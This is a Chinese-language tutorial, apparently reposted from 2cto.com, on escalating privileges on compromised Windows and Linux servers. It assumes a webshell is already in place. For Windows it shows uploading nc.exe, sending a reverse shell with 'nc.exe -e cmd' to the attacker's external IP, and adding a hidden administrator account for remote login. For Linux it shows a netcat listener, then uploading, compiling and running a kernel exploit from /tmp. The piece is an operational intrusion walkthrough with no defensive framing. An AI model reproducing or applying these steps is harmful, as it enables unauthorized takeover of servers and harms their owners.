Windows下NC反弹CMD提权
Server-U等都不可以用的情况下. 一般都可思考用此方法
不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口… 那么这种方法也失效了….
1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)
web目录都是有写有读的权限,我们直接传NC进去
2:然后本地执行nc -vv -lp 52进行反弹
3:在shell命令下执行
F:\wwwroot\img\nc.exe -e cmd路径 IP(外网IP) 52(这里是本机端口)
ps:上面的cmd路径可以是系统自带的cmd路径,也可以是自己上传的cmd路径。
4:在shell里执行命令后,马上看到本地CMS里已经反弹上去了,执行net user 也是成功.
5:直接添加用户,然后远程去连接!
看到添加成功,也设置为管理组了!接下来直接远程连接就OK!
Linux下使用NC反弹本地简单的提权
- 很多时候拿到shell了,然后在菜道或Shell里执行简单命令不允许!说明权限很死或者被管理禁止了!这里我已NC将SHELL反弹回本地提权!
先看下linux内核uanme -a2.6.18-194.11.3.el5 内核 ,这个好CentOS release 5.5的系统!找个外网IP 监听12666,当然12666也可以改。我这里用NC监听nc -l -n -v -p 12666然后再点你shell连接成功就出现下面的内容然后百度找2.6.18-194这个内核的EXP,我已经收藏过.然后通过Webshell把EXP上传到/tmp目录下,为什么要传到这个目录呢?因为在Linux下一般tmp目录的权限是可写可执行!然后我们进到/tmp目录cd /tmp 进入到tmp目录了,看下我们之前上传的2.6.18-194我这里有权限rwx,可读可写可执行.如果没有权限执行命令 chmod -R 777 文件名我这里的exp已编译过了,直接执行溢出就ok了 ./2.6.18-194 要是你的exp没有编译那么先执行 gcc /tmp/文件名.c -o /tmp/文件名命令先把他编译好,在执行 ./2.6.18-194运行EXP就OK了!
转自:
1、http://www.2cto.com/Article/201303/198404.html
2、http://www.2cto.com/Article/201303/198407.html